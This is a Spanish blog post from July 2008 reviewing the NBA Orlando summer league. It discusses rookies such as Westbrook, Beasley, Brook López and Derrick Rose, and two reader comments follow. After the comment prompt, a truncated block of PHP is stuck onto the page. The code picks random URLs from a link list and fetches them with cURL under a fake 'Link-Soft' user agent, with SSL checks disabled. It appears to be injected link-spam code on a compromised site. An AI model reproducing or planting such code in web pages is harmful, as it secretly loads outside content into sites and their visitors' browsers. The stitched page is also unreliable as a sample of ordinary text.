Resumen de la Orlando Pro Summer League 2008

13 de July de 2008 por Dantley

La liga de verano de Orlando ha dejado la habitual estela de comentarios sobre errores o aciertos de los equipos en sus elecciones del draft 2008. En época de poca actividad, es normal que se suelan sobrevalorar actuaciones individuales en las ligas de verano, pero como ya advertíamos en la previa, no está de más acordarse de la actuación de Belinelli en el verano de 2007, y los pocos minutos que disfrutó posteriormente durante la liga regular.

No obstante, siempre hay actuaciones interesantes. No deja de ser un divertimento de verano en el que quizá los verdaderos triunfadores han sido Dante & Galante, la ocurrente pareja de comentaristas de nba.com que han transmitido desde una simple pero efectiva webcam, todo lo que ha sucedido en la cancha. En uno de los muchos e-mails recibidos, un fan se quejaba de que su novia le había dejado porque veía diariamente todos los partidos de la summer league, a lo que los comentaristas respondieron con un “normal, yo también te habría dejado”. Si tú eres uno de estos capaz de permanecer conectado a las ligas de verano, te encontrarás como en casa en nuestro blog.

El quinteto ideal elegido por los internautas lo componen Russell Westbrook, Courtney Lee, Jeff Green, Michael Beasley y Brook López. Es una buena selección, si bien Mario Chalmers y el poco talentoso pero muy profesional Marcin Gortat podrían haber entrado en dicho quinteto. Kevin Durant sólo jugó un partido –fenomenalmente-, por lo que no parecería lógico incluirlo entre los mejores.

Russell Westbrook ha empezado a demostrar que quizá nos equivocamos los que pensamos que su elección con el pick 4 fue excesiva. Sin la sombra de Kevin Love, Westbrook ha demostrado mucha más ambición en ataque promediando 16 puntos por partido y distribuyendo el juego con más fluidez de la esperada. En defensa, ya eran conocidas sus habilidades, aunque en su enfrentamiento con Chalmers salió en tablas.

Courtney Lee ha destacado con su capacidad de generarse sus propios tiros. Ha promediado 20 puntos por partido, encestando desde todas las distancias. Su elección con el pick 22 parece cobrar sentido. Se jugará los minutos con Redick.

Jeff Green ha parecido muchísimo más agresivo de lo que demostró la temporada pasada. Quizá es la necesidad de aportar otros recursos a la franquicia de Oklahoma City, pero lo cierto es que Green ha mostrado signos inequívocos de que quiere más protagonismo. Su selección de tiro no siempre ha sido la más acertada, pero definitivamente ha salido fortalecido de Orlando.

Michael Beasley ha alternado grandiosas actuaciones como la ofrecida el primer día frente a Miami, con otras que han podido sembrar alguna duda sobre su capacidad de integrarse en el juego de equipo. Sus casi 20 puntos por partido quedan por debajo de otros jugadores, pero aún así, exceptuando la aparición fugaz de Kevin Durant, pocas dudas hay de que Beasley es el jugador que más ha impresionado en Orlando. Su velocidad de pies y manos lo hacen muy difícil de marcar en este nivel de juego. No obstante, Sean Williams parece haber ofrecido la clave de cómo pararlo. Ahora queda la duda de cómo Pat Riley va a ser capaz de obtener lo máximo de este jugador, a día de hoy favorito para rookie del año.

Completa el quinteto ideal Brook López. Brook ha dado un recital de juego ofensivo interior. Tiros contra tablero, ganchos, reversos, parece que ya recién entrado en la liga, Brook López domina los secretos de los grandes centers en ataque. Casi 20 puntos en poco más de 24 minutos así lo atestiguan. Sin embargo, ha reforzado también las dudas sobre sus debilidades. Su defensa no ha sido mala, pero hay que tener en cuenta el escaso nivel que tenía enfrente. Y en cuanto al rebote, menos de 5 rebotes parece una cifra ridícula para un 7 pies¸ habiéndose quedado incluso en cero rebotes el primer día. Probablemente, dicha debilidad le restará minutos durante la temporada.

No debemos olvidar algunas otras buenas actuaciones. Mario Chalmers ha demostrado que tiene sitio en Miami. Ha estado por encima en juego que en números, pero tanto su fenomenal dirección como algunos momentos de buena defensa han dejado un gran sabor de boca. De alguna manera ha dado la razón a los Heat que le han realizado un poco habitual contrato de 3 años para una segunda ronda de draft. Chris Douglas-Roberts también ha dejado constancia de que su juego puede tener traslado a la NBA, un poco al estilo de Richard Hamilton.

Finalmente, las ligas de verano son la oportunidad de jugadores menos conocidos de ganarse un contrato. Por ello, no debemos dejar de destacar a Jaycee Carroll, quien no fue drafteado, pero que se ha ganado en Orlando la oportunidad de tener un contrato en la NBA como tercer base o un buen contrato en Europa.

No podíamos concluir sin hacer mención a Derrick Rose. Tuvo dos malas actuaciones y probablemente sus entrenadores decidieron parar la sangría antes de que fuera a más. Cierto es que tenía ciertas molestias físicas, pero su comienzo no ha podido ser más decepcionante. Eso sí, recordemos que hablamos de ligas de verano. Rose sigue siendo ese jugador con unas condiciones impresionantes para dirigir a un equipo de baloncesto. Simplemente, hay que ir cubriendo etapas.

Las ligas de verano continúan en Las Vegas. Ayer día 11 comenzaron con buenas actuaciones de los rookies Anthony Randolph, Marreese Speights y OJ Mayo, así como de sophomores como Thaddeus Young y Rodney Stuckey. Los partidos pueden seguirse desde las 10 de la noche hora española en http://www.nba.com/summerleague2008/

Comenta

2 comentarios a esta entrada

  1. txusma dice:
    #1

    Me acabo de fijar que Jayce Carroll tb esta en la liga de verano de Las Vegas con los Raptors. Un autentico jornalero.
    De momento, buen primer partido.

      Citar

  2. Dantley dice:
    #2

    Buen punto. Yo equipo de la ACB le hacía una buena oferta ya mismo. Le falta físico para defender a muchísimos bases de la NBA, pero está demostrando mucha profesionalidad, buen tiro y mucha inteligencia.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>